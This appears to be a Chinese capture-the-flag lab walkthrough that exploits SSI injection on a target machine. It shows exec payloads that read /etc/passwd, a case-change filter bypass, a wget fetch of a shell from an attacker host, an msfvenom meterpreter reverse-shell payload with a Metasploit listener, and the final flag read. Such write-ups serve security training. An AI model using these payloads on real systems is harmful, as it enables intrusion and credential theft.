ssi注入
ssi注入就是寻找一个输入点输入类似<!--#exec cmd="命令" --> 格式,看看能不能运行系统命令。
如 <!--#exec cmd="ls" --> <!--#exec cmd="cat /etc/passwd" -->
切换目录<!--#exec cmd="cd /root/dir/" -->
像正常一样先ifconfig扫描出自己的IP,然后nmap -sV 攻击机IP 可以得到靶机的IP以及开放的端口及相关信息。
看到靶机开放了http服务的80端口,使用dirb探测敏感信息
然后通过robot.txt的链接,/spukcab/,
用它代替robot,txt得到两个文件index,bak oldconfig.bak,下载下来用终端打开
得到一系列的代码文,不知道有没有用,把两个全cat下来。
除此之外还有
这个东西和SSI注入的格式一样,比较敏感,双引号里面是对应的Linux命令,通过这个命令我们能获得当前系统的用户名及其密码
接下来要用SSI注入漏洞
刚才我们尝试的链接,出现这个登陆的页面,我们打开,
把这个复制到target和feedback里 <--#exec cmd="cat/etc/passwd/"-->
也可以把execbiancheng 大写,
登录成功
出现的是我们刚才复制的Linux命令,
然后我们返回刚才登陆的页面,把feedback那一栏--前加个!得到
返回了etc文件的效果以及内容
下一步
下载shell脚本并重命名 <!--#exec cmd="wget http://ip/shell.txt | rename shell.txt shell.php" -->
制作webshell:
msfvenom -p php/meterpreter/reverse_tcp lhost=攻击机IP地址 lport=4444 -f raw > /root/Desktop/shell.php
打开metasploit启动监听:
msfconsole
然后设置参数
设置完之后输入run
然后下载Python脚本,
并重命名为shell.php
<!--#exec cmd="wget http://ip/shell.txt | rename shell.txt shell.php" -->
即在登录页面输入,1 和上式
把shell.py移到/var/www/html/ 的根目录下
查看当前目录信息
开启apache服务,然后service apache status查看是否开启。
查看是否返回shell
刚才将L命令大小写转换绕过过滤机制,上传shell,反弹shell,
然后还要赋予shell.php权限 chomd 777 shell.php
执行shell后命令:sysinfo 查看系统信息 ;
shell 进去系统shell;发现和以前不太相同
python优化shell
优化后,
我们cd/root/
ls
cat flag